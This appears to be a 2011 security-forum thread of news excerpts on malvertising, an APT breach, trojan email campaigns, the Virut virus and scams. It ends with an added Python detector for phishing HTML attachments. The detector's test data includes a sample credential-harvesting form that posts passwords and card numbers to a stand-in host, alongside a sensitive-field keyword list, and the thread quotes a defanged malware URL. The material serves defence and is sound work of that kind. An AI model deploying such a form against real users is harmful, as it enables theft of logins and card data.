UK - malvertising attack ...
FYI...
- http://www.theregister.co.uk/2011/02...ight_uk_sites/
28 Feb. 2011 - "Several highly trafficked UK sites – including the website of the London Stock Exchange – served malware-tainted ads as the result of a breach of security by a third-party firm they shared in common. Surfers visiting auto-trading site Autotrader.co.uk and the cinema site Myvue.com were also exposed to the attack, which stemmed from a breach at their common ad provider, Unanimis, rather than at any of the three sites themselves. Unconfirmed reports suggest eBay.co.uk was also affected. The malicious ads made several concealed redirects before dropping surfers on a portal pimping rogue anti-virus (AKA scareware)... Websense** confirmed the attack on Monday, saying it had been tracking the progress of the attack over recent days..."
* http://www.highseverity.com/2011/02/...y-malware.html
** http://community.websense.com/blogs/...vertizing.aspx
Morgan Stanley security breach...
FYI...
- http://www.bloomberg.com/news/2011-0...it-google.html
2011-02-28 - "Morgan Stanley experienced a “very sensitive” break-in to its network by the same China-based hackers who attacked Google Inc.’s computers more than a year ago, according to leaked e-mails from a cyber-security company working for the bank. The e-mails from the Sacramento, California-based computer security firm HBGary Inc., which identify the first financial institution targeted in the series of attacks, said the bank considered details of the intrusion a closely guarded secret... The HBGary e-mails don’t indicate what information may have been stolen from Morgan Stanley’s databanks or which of the world’s largest merger adviser’s multinational operations were targeted... a spokeswoman for the New York-based bank, which unlike Google didn’t disclose the attacks publicly, declined to comment on them specifically... The hackers successfully implanted software designed to steal confidential files and internal communications, according to dozens of HBGary e-mails that detail efforts to plug the holes. One e-mail, dated June 19, said that the attackers may be the same ones who had hit a U.K.-based defense contractor and discusses hacking software called Monkif, which can be used by intruders to remotely orchestrate a sophisticated form of cyber attack known as an ‘advanced persistent threat’ or APT..."
- http://blog.damballa.com/?p=341
"You have received a gift..." of malware ...
FYI...
- http://blog.mxlab.eu/2011/03/01/you-...ad-to-malware/
March 1, 2011 - "... new trojan distribution campaign by email with the subject “You have received a gift from one of our members !” The email is sent from the spoofed address “gifts@freeze.com”, while the SMTP from address is “_www@pictry.loc”... The URL in the email leads to hxxp:// www .i-tec .it/gift.pif and this malicious file is 844kB large... A Backdoor.IRCBot is installed allowing to open a backdoor to the infected computer, combined with Trojan.RunKeys that will make sure that trojans are started up when the computer boots... malware will make a connection with a remote IRC server..."
(Screenshots and more detail available at the MXLabs URL above.)
- http://tools.cisco.com/security/cent...o=1&sortType=d
Facebook SCAMS prolific...
FYI... "SCAM of the Day" - it's almost that bad...
- http://nakedsecurity.sophos.com/?s=F...+scams&x=0&y=0
March 7, 2011, March 5, 2011, March 3, 2011, March 2, 2011, etc...
Malvertisements - a plague...
FYI...
- http://threatpost.com/en_us/blogs/on...nd-2010-030711
March 7, 2011 - "... The Dasient Q4 Malware Update* reported that more than one million Web sites were infected in the last quarter of 2010. That period saw a 25% growth in malicious advertisements from the previous quarter, as attackers found ways to sneak malicious code into widely used syndicated online ad networks. It's a trend that security experts see accelerating in 2011, as malicious advertisements, sometimes referred to as 'malvertisements,' crop up on high profile sites, said Neil Daswani, Chief Technology Officer at Dasient. Daswani said that, overall, his company saw a 100% increase in the amount of malicious advertising from the third- to fourth quarters, 2010. However, much of that was due to an expansion of the sites Dasient monitored, with an increasing focus on so-called 'remnant' ad networks, which aggregate 'remnant' advertisements from direct marketers, who often have little oversight about where the ads appear... In recent weeks, well-ranked sites such as Autotrader .co.uk, cinema site Myvue .com and londonstockexchange .com were reported to have served up malicious advertisements. Malicious ads are commonly used to display pop up messages with links that will take users to a drive by download Web site download rogue anti virus programs or other threats..."
* http://blog.dasient.com/2011/03/dasi...gnificant.html
Virut malware spreads with warez ...
FYI...
- http://techblog.avira.com/2011/03/11...ut-malware/en/
March 11, 2011 - "W32/Virut.ce is one of the most widespread pieces of malware which can be found on infected computers. This file infector gets massively spread bundled with illegal software (warez). The virus is infecting executable files using latest techniques which make detecting and treating those files particularly difficult. On the current threat landscape we see more server-side polymorphic malware, infecting executable files is not as popular as a few years ago. During the last years emulation techniques have become better which makes detection of polymorphic malware much easier. The authors of the virus weren’t put off by the difficulties they faced in trying to infect executable files. But W32/Virut.ce is not only infecting executable files, the virus also includes a backdoor using the IRC protocol. This allows attackers to download and run further malware from the Internet which can (as example) steal information. The server to which the malware connects is a pre-defined IRC server, the channel is called “virtu”..."
- http://techblog.avira.com/wp-content...Virut_.ce_.pdf
(PDF, 1 MB)
FTC advisory - charity SCAMS
FYI...
- http://www.ftc.gov/opa/2011/03/earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/bcp/edu/pubs/cons...ts/alt114.shtm
___
- http://community.websense.com/blogs/...-disaster.aspx
15 Mar 2011
Phish targets BoA, PayPal...
FYI...
- http://www.theregister.co.uk/2011/03...irefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86security.com/2011/03/...ml-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."
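Added example (not from the post above or the articles it quotes): a mail-gateway style check for the technique described in the phishing item, flagging HTML attachments whose form POSTs credential or card fields to a remote web server. The field-name hints, the sample e-mail, the file name `verify.html` and the host `compromised.example` are all constructed assumptions.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = ("pass", "card", "cvv", "ssn")  # assumed field-name hints

class FormAudit(HTMLParser):
    """Record every <form> with its method, action and sensitive input names."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"method": a.get("method", "get").lower(),
                               "action": a.get("action", ""), "fields": []})
        elif tag == "input" and self.forms:
            name = a.get("name", "").lower()
            if a.get("type", "").lower() == "password" or any(s in name for s in SENSITIVE):
                self.forms[-1]["fields"].append(name or "(unnamed)")

def suspicious_forms(raw: bytes):
    """Return (filename, remote host, fields) for each attached HTML form that
    POSTs sensitive fields to an http(s) URL."""
    hits = []
    for part in message_from_bytes(raw, policy=policy.default).walk():
        fname = part.get_filename() or ""
        if part.is_multipart() or not fname.lower().endswith((".htm", ".html")):
            continue
        audit = FormAudit()
        audit.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        for form in audit.forms:
            url = urlparse(form["action"])
            if form["method"] == "post" and url.scheme in ("http", "https") and form["fields"]:
                hits.append((fname, url.hostname, form["fields"]))
    return hits

def sample_message(html: str) -> bytes:
    """Constructed test e-mail: plain-text body plus one HTML attachment."""
    m = EmailMessage()
    m["Subject"] = "Account verification (constructed sample)"
    m.set_content("Please complete the attached form.")
    m.add_attachment(html, subtype="html", filename="verify.html")
    return m.as_bytes()

# Constructed attachment bodies: one credential-harvesting form, one harmless form.
PHISH = ('<form method="POST" action="http://compromised.example/update.php">'
         '<input name="email"><input type="password" name="password">'
         '<input name="cardnumber"></form>')
BENIGN = '<form method="get" action="/search"><input name="q"></form>'
```

Because the form is opened from a local file, URL-reputation checks in the browser never see a page load, so the attachment itself is the place to inspect.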